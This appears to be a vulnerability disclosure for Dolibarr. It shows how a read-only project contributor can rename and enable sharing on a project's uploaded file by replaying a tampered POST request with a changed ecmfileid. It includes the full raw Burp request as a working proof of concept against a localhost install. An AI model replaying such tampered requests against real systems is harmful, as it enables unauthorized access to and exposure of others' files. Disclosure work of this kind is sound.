💥 BUG

unprivileged user can edit/share linked file of a project .

💥 VIDEO

https://drive.google.com/file/d/1YaiG0vjFTuqZRck7dMLqkhT7HSZqaEdu/view?usp=sharing

💥 STEP TO REPRODUCE

1. From admin account add user B as normal user .
now give user B bellow permission for project module.
---->Read projects and tasks (shared project and projects I'm contact for). Can also enter time consumed, for me or my hierarchy, on assigned tasks (Timesheet)
2. Now from admin account goto https://localhost/dolibarr/htdocs/projet/index.php?mainmenu=project&leftmenu= and create a project.
now add user B to this project a contributor .
Also upload a file there .

3. Finally goto user B account and visit above project .Here user B cant edit above uploaded document .


Now user B sent bellow request in burpsuite to edit/share the document .

POST /dolibarr/htdocs/projet/document.php?&id=1&file=PJ2105-0001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 275
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr/htdocs/projet/document.php?action=editfile&urlfile=PJ2105-0001%2FPJ2105-0001-simple.html.noexe&id=1&file=PJ2105-0001&page_y=504
Cookie: DOLSESSID_0553a67aec6c8cfb8172aadb09812143=4ueq8h2hcsro2cicatu2umspk9
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$eIz0ktTX4BELW6Fo.nN3NeeCTrlUUouAR.pwUqzkRAdBKaN.u3DVy&action=renamefile&id=1&modulepart=project&section_dir=PJ2105-0001%2F&renamefilefrom=PJ2105-0001-simple.html.noexe&renamefileto=PJ2105-0001-sssimplse.html.noexe&shareenabled=on&ecmfileid=22&renamefilesave=Save

here in this postdata you change ecmfileid parameter value to your file id

💥 Impact

privilege escalation bug